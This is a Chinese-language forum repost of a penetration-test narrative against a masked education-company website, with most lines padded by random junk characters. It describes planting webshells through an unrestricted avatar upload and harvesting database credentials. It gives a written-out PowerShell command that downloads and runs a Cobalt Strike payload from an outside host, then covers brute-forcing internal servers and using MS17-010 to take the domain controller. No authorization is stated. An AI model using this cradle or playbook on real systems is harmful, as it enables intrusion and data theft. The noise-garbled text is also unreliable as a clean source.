|
9 h: q) {9 [5 }; C8 i
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路4 ~! _9 }+ I. h" j! z. q5 \
^7 a* e L# }- ?4 k/ X: s w8 f. y7 J g4 _( n4 [9 n* P
6 b. m( h: K6 y4 _( V, z
; x. m9 S; e0 u1 `' W3 {
: M, G' @& z8 }( g( k, @! ^6 l, f! `6 ~ 正文
9 p1 V# }8 G9 `+ k7 Q/ e
- E" V% [" d5 A$ c& C2 P8 {( N3 `/ V }2 V* ]
% l- t" q: j1 s: ]: r) T/ b% V
6 L6 @* U- a5 H v" Y ]9 r. r/ N* ]+ `) ~7 t: }0 p# u
目标:www.xxxx.com(一家教育机构)
; b! X6 i: H% A# H打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
# P2 k/ U ~: Q% n% C- K1 [
' Z U8 v; c! k5 X! E3 \
p7 a7 s* g7 Y h& l4 t0 I  : l- i# d1 Z0 Z1 q) s" R+ P5 G
J4 R$ _/ t {1 }
+ R% I! Q: G; r' r* `
进行了简单的信息搜集
( i2 r w5 n X
: `$ r; x' J. x) O/ \
3 H( e1 T2 ~8 l7 D# h$ l
9 P* h% i& c% B! _- V4 i/ S
1 z: }. Y" n: V3 i 子域名搜集 g2 z6 \" i- I, p2 L; D
" y" S+ B* \- u0 `# j7 f9 C: T# ^5 J. G4 Z0 ~
& w+ g5 \2 }4 N: u- O3 C# Y 2 o1 z4 Y6 p8 U, n- g$ k
0 O& \: d" g" |
fofa找资产
$ u2 T: m0 F2 j# w( z
4 u. ^8 j/ x9 `8 A" Q+ N! k% V/ B$ K9 K
* l1 O: @4 Z2 [1 M$ L% J3 h0 Z, E( e: h$ T b/ E
* \9 o% {7 A: I0 h1 P 7 g/ P8 ]4 @" D. Y
Q- Y8 F) X* {4 Z/ p7 J3 ?
一共七个资产。去重之后只有两个。
' M' T1 J) _! U. P0 b. V
# p0 j% Y; M1 p7 H r" l9 T5 R$ ~9 v0 w& r; x% P
, u: \: w* P$ V- I/ j1 r
. n, y" d) O5 R$ P4 ^
目录探测& Y/ O. I8 o: f- G
3 s9 I' n+ o# r e
, ?) r% F* Q- C  " C8 s2 y7 E+ a8 e: l) f
4 E# S+ a$ }$ ~! B
1 T r* R) B+ i- G& K7 f, `$ F% \ 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
4 d6 P0 G* L- X$ O7 I2 f5 m& F
9 m* H/ h6 O/ |7 z8 F
* [. L- b0 P! r* k7 n# h4 s' o' I6 p
" P9 q: q# `+ O# R4 V
, }0 r& s* Y0 @, C$ j& ^" E 我又尝试了通过修改返回包来绕过登录界面
% P) m$ }6 O' K: _
) Z* [; y5 \' @! x/ N3 f+ W, K8 E# F
 + S/ S0 A2 b9 ~7 C0 c! ~4 a1 [
% i" l) Z/ y# a" q5 V9 E
( B5 R6 s5 w0 M9 c* x
还是不行,尝试注入无果
2 I# W0 S' |% x4 l. a7 ? , ]( B+ s5 W6 I$ b! h
/ m* g0 x- h/ U5 e; } 
; z1 `* l9 y5 ^, T; f 6 Y- B J. n2 t) T( n" A8 v4 ]3 r# O$ y& F
9 q# S# T3 \7 m! M3 f/ Y: F# E* M5 B
不过我目录探测出了一处Spring信息泄露
3 S; e1 K) N8 e1 @& K
+ {1 D/ Z. Q' t5 Z6 N& j
3 [" R5 P8 f! t6 g& T, S( \ - O, ~. _, i0 G' i7 \, }3 \0 q
; u* q0 u5 N9 H- R- e' r8 _
 " V! r! V; `* U
7 o6 Y+ t+ f# [- q5 z4 d2 s- u" y) g+ h( C: [% y- L
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录. ]) A' s$ }- h) `+ P
/ { ~0 W( `0 j7 w: ?# I
0 P; E# `) [9 T6 k% a  : p* ]( ~9 a- s+ }( N
8 [$ x$ Q/ [) I: R$ Z1 J% ]- n$ z( C: ?' }
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。+ Y, C2 R( e( k9 ~' l' ?
8 _' i1 r0 `; b* y" r! J. L4 E4 [+ B. E' X
9 a7 V; } q- e2 n! Y
 & l4 x ~# g+ K8 o) i! p
( X% g" \* [) P$ K3 H( T) R+ T
6 b/ }) E! |( |" z$ R2 N$ j4 c 获取有些师傅到这一步就手机抓包电脑测了。
+ s$ Z1 A. A- L' ?& e* l
0 j3 R5 l' P+ r+ f5 O$ y. V0 G
. b, \! K7 Q ~) f+ N- c% b Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
) ~3 a) _ Q" S: C6 U0 f, T+ C
. x5 C, L9 u& q( ^
- V$ A3 z& [/ \3 V4 c: R+ i8 E 其中在一个公众号发现了小程序,可以进行注册。+ a: F! N' T# b7 o, h% Z
- M% \5 |* M0 \% X0 _4 s+ i. V2 Q$ e" y( ]; B7 p1 ~! d+ I) e
看到了头像上传,尝试上传获取WebShell* R5 o3 f' K! Z2 V( G" B
- h' }' A- }; V3 f5 @( c/ U5 W( w a( l7 N. T
 ( |! K; ^. S# @( W/ h1 s
+ j1 U l6 {) Z3 Q, Z6 S1 O% a! O; b
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问4 c- j& \4 h+ [
/ U' A+ |2 n8 U7 p! G. R) W
. X2 ]. h/ ?3 B7 q' R( z
 $ z# I/ R7 b1 s( y4 J. l
3 g |+ q" O+ R/ n5 U
. @' D" c6 t1 P 然后上了大马
! w: Y: n1 {, m+ _) M5 L . s% ]' K& ]: t
# S; q1 _ Q* {' f 
' B! z, ^/ A4 e* [: e# k0 H) J, P 4 k8 |9 J0 Z. f2 F% W& C( q0 k, R: O
; y+ p! V- V7 J. p H; F5 Z" i
 : v: B" a$ k2 [) N/ r5 a' I
3 k \" K2 i4 [. e. f$ s, C$ E7 f' R
8 K1 s" f- J, v1 W; l
通过翻找文件发现数据库账号密码9 k p, R) G' b1 l+ j9 b- M
$ H5 F Z' P" N! i% V4 _. Z7 H7 i3 l+ f4 [/ W
 5 V7 C1 y9 t) U- u7 B6 d, U
% Y4 T& A* u( D5 r/ }
6 b6 G) J3 c1 [: f C2 i) I) } --内网渗透
% L* ?" v, M4 q" a' v- ? ?7 L- f, t4 c5 B: L
5 |- L. f& K2 \7 t& X2 v# O- E 直接通过powershell执行 cs上线
/ V: Z o& i1 P% w. t8 @ ( Y- y8 N+ |. ~! S( ^; S
9 r: b* l' {7 |! Z& I
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
; _. b( z ?7 q$ \ , Q K& T, H7 |, ]
. z1 D7 ? D5 K3 ]& A
n; w( U8 ?, Z2 X
! d; K. d7 e B- }& ~
8 L m: r. e% F; d9 x5 z- O% o 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破5 u H' [5 `3 X4 E/ m$ F: N3 Y9 ^4 m
/ Q/ ]6 h. p& w% m' u6 h2 q' v4 ~
0 N6 n3 f' s2 z/ c5 Q% k+ \ 
0 w# m I+ i) g# ? Z! m' U 8 E; q; D: E1 `, g+ ~4 E( e
4 y. n: j7 r8 E8 |2 b3 r
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
( }7 o/ T" M6 X, f5 x g
: o' U6 K- S# m
& z% U/ m( r! f
2 H: a9 w* a! o" |+ G
% o% p* q4 t: c
/ u/ f/ K+ X/ c" } ] 
- n# f, I# N6 f ; o7 D" _4 X3 G+ t( Q5 o
7 H, o8 x7 W; u2 M" [
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
@+ k5 O+ z0 a8 d `7 d
6 _' g9 c; G# S [3 z
5 q5 v( o5 G7 h* e$ J % Q, d, M: \ X/ F: ^' p/ w
; d+ I8 z8 {+ h/ X" d 
$ }+ t0 g8 K* j: |; @% d! {
) k: ^2 _ r" O6 ~: U, ]# C7 ^) e6 Q) y( _
& P# z$ F" u5 F. d: U; ~9 F
! `& \% @/ y# O
1 Y( o* H5 R; L" a
2 C. R, @/ b: ?, Y2 Y1 _+ p5 @2 E# g# |5 t: W( ~7 k, t
9 D1 b$ L4 Z3 P4 p) o; Z E* f
" l: ]6 c: K, B; I1 |) I: T/ G t$ P4 M5 C: x. [
小结! p3 v% z9 f- W/ R3 i
: v0 e) }3 C: U" H8 g! P+ R' h) U* s6 l! `( \
2 e5 c: n( a3 X3 ^$ z# D
! P3 U* l/ N0 n: r0 v8 J/ Q7 g+ G
' M* ]& S1 ~% F9 [ 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
) S( p, V) p- a0 ~7 u: C
- z- R) p7 v$ p% C
2 G5 g E# \+ f# S% w# t
; B+ q/ @* g& Q ! l4 {( @: l! d1 w4 B' \2 q
* U- F2 Z) x& A/ y, C& F$ D - 9 H9 T. f1 Y6 l. x
; n4 D4 p% s3 h9 W9 D0 W9 n
" J: k; N5 G$ G" q- ~ - 6 G5 `3 H" G0 Z: ]2 J
0 a' M% l, @9 D4 a6 K1 n" H5 o
& C5 K7 W5 |7 n6 u) L! U
& }: W3 t1 { B8 d* g5 ^7 U8 n! |4 d3 O
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html$ p, G2 Q8 q! Y$ s' Z. w) [( i
0 u% J2 w% W4 w, T" V8 s
/ b. ?2 R. G# k8 w+ H" }4 p9 o5 l4 W 4 ?$ H2 J6 ^! q7 p! Q: g
| 
发表于 2024-3-1 19:41:32
收藏
支持
反对